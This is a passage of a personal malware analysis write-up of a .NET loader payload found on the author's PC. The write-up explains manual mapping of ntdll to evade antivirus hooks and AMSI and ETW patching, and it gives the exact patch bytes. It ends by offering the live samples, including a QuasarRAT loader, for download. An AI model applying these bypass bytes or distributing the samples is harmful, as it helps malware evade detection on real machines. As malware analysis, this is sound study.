And it’s also got it’s own GetProcAddress() implementation as smethod_4. In this screenshot, it’s running through the 1634 exports of kernel32.dll whose base address it got from this other method smethod_3 which basically functions as its own version of GetModuleHandle():



And it stops once it arrives at the requested API call (in this case, CloseHandle()), it returns the address:


And it’s got smethod_2 that gives it the address of any exported API function from any library using the results of smethod_3 and smethod_4:


The following static members are delegates or ready-to-use functions for these win32 APIs: kernel32.dll!CloseHandle(), kernel32.dll!FreeLibrary(), kernel32.dll!VirtualProtect(), kernel32.dll!CreateFileA(), kernel32.dll!CreateFileMappingA(), kernel32.dll!MapViewOfFile(), msvcrt.dll!memcpy(), psapi.dll!GetModuleInformation() and kernel32.dll!IsWow64Process():


Oh, and smethod_0 is what resolves the garbage strings to their real forms:



Now, let’s see the Main() method of the program:


It calls smethod_1 with “ntdll.dll” as the parameter (the smethod_0 call resolves the Chinese-looking characters into “ntdll.dll”):



I copied the method into Visual Studio Code and added some comments, since the previously prepared delegates for win32 API functions have been used in this method. I’ve included this code in the “SecondPayload” folder:


I also asked Skype’s Bing chat what this code did:



I also searched the internet for why a program might want to manually map ntdll and came up with some informative articles:

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/

Turns out, it’s an AV evasion technique to avoid falling into the trap of hooks set by antivirus software. Most realtime AV software will place hooks into API functions exported by windows dll files that are commonly used by most programs to inspect the data being passed to these functions and check if anything fishy is going on and stuff like that. If a malware calls any API exported by such a dll say, ntdll.dll, its function calls are going to be intercepted by the AV. So, in a bid to circumvent this “function hooking” set up by AVs, malwares use a trick called “manual mapping” of the required dlls, so that the modified/hooked function exports of the loaded dlls are replaced by a fresh copy mapped directly from their corresponding files on disk. After this step, the malware can safely call any export of the dll and be sure that the AV won’t be privy to this operation.

So, all that method_1 is doing is mapping a fresh, unmodified copy of ntdll.dll to its memory. The same thing is being done to kernel32.dll as well, if the OS is Windows 10 or 11 (major version no. > 10) and 64-bit:

Now, line 16 i.e. smethod_0 call looks like following:


The first parameter is “amsi.dll” – a dll file present on Windows OS starting from Windows 10 and it exposes functions for checking if a given buffer contains malicious code. (See AmsiScanBuffer function on MSDN) The second parameter is “AmsiScanBuffer” which is a function exported by amsi.dll. On Windows, when PowerShell is opened, it always loads this dll and calls the aforementioned function to check for malicious payloads when it is executing powershell scripts. The third parameter ‘byte_0’ holds an array of bytes: { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } and the fourth parameter ‘byte_1’ holds { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } which looked like opcodes to me and I asked Skype Bing Chat, to which it replied with astonishing specificity and insight – as if these bytes are always used in association with AmsiScanBuffer patching:


So, it basically looks like it’s trying to patch the contents of the AmsiScanBuffer function with bytes that return AMSI_RESULT_CLEAN (for details, look it up on MSDN) for both x32 and x64 bit version of the process. Apparently, “amsi bypass” has been a thing ever since PowerShell based malware rose to prominence:

https://blog.f-secure.com/hunting-for-amsi-bypasses/

https://threatresearch.ext.hp.com/disabling-anti-malware-scanning-amsi/

https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux

I would guess, if this .NET payload (which is very small btw, 15 KB these days is considered tiny) is loaded by a powershell script (which runs in the process of PowerShell) via Reflection (Assembly.Load() and what not) and invoked (https://stackoverflow.com/questions/23174205/how-can-i-run-an-exe-file-with-assembly-class), the PowerShell process would be defenseless against malicious scripts – even well known and signature payloads would fail to be reported since the AmsiScanBuffer function would always return clean.

In my case, where I’m running the payload separately as a debugee using dnSpy’s debugger, there’s no “amsi.dll” to be found in this process’ modules as is evident from Process Hacker:


So, the program throws an exception and lands on the catch block at line 44:


Now, the smethod_0 call at line 17 looks like the following:


It’s trying to patch another function exported by ntdll – EtwEventWrite()

Turns out, this function is used by processes to expose information about the managed assemblies (.NET binaries) that have been loaded in them. Tools like Process Hacker can see the .NET assemblies loaded in a process because all processes participate in this reporting using EtwEventWrite(). More info can be found all over the internet but I read this article by Adam Chester and found it really enlightening: https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/

From this article, I also learnt that the previous function patch for amsi.dll also works for managed processes using .NET Framework 4.8 and above (they apply checks, when Assembly.Load()’ing a .NET assembly, for malware using amsi.dll’s AmsiScanBuffer()):


More info on this topic is available on the post by Adam Chester I linked above.

Anyway, going back to our EtwEventWrite function patch, the bytes used for patching this time are (third and fourth params of smethod_0) are { 0xC3 } and { 0xC2, 0x14, 0x00 }:


0xC3 is obviously a RET and the 3 bytes in the fourth parameter correspond to RET 0x14 apparently, according to Skype Bing Chat:


Obviously, as before, the fourth parameter is for patching in a x64 bit process.

So, the second call to smethod_0 is intended to hide the loading of .NET assemblies to a process (typically unmanaged, as I gathered from the previous article) so that tools such as Process Hacker and probably AVs don’t see what .NET assemblies have been loaded into a process. And of course, this time, it succeeds because ntdll is loaded in all processes:


That’s all this binary does. So, going back to our original powershell script:


Observing lines 48 and 49, it’s clear that the powershell instance is going to first execute the second payload for the amsi and EtwEventWrite bypass and then the actual, first payload which VirusTotal thought was QuasarRAT. If all had gone well, a PowerShell process would have been running QuasarRAT and Windows Defender wouldn’t have a clue, and neither it nor we would be any wiser to the fact that a RAT had been loaded into it.

Some side notes:

-Avira doesn’t consistently detect the second payload. Sometimes, it says clean and sometimes says it’s a malware and quarantines it.

-I had noticed mouse cursor flickering a week or two prior to this incident and noted down the times:

July 4, 2023

10:45 AM

12:56 PM

1:55 PM

3:15 PM

3:45 PM

4:15 PM

July 6, 2023

2 PM

2:45 PM

July 7, 2023

2:45 PM

5:15 PM

5:32 PM

July 11, 2023

3:45 PM

4:15 PM

4:36 PM

5:15 PM

-I still don’t know what caused the malware to be dropped into %appdata% in the first place.

-I was at first convinced that the file “udgbQ.bat.exe” was the malware but later realized it’s just an x86 PowerShell binary copied from System32.

-The two payloads have been included in “FirstPayload” and “SecondPayload” folders separately. Each folder contains “output.bin.zip” which is the Gzipped version dumped from the powershell script and can be extracted using Winrar/7-zip. Or, just run the powershell script for decompressing the payloads and dump those bytearrays instead for the actual executable payload.

Download the malware here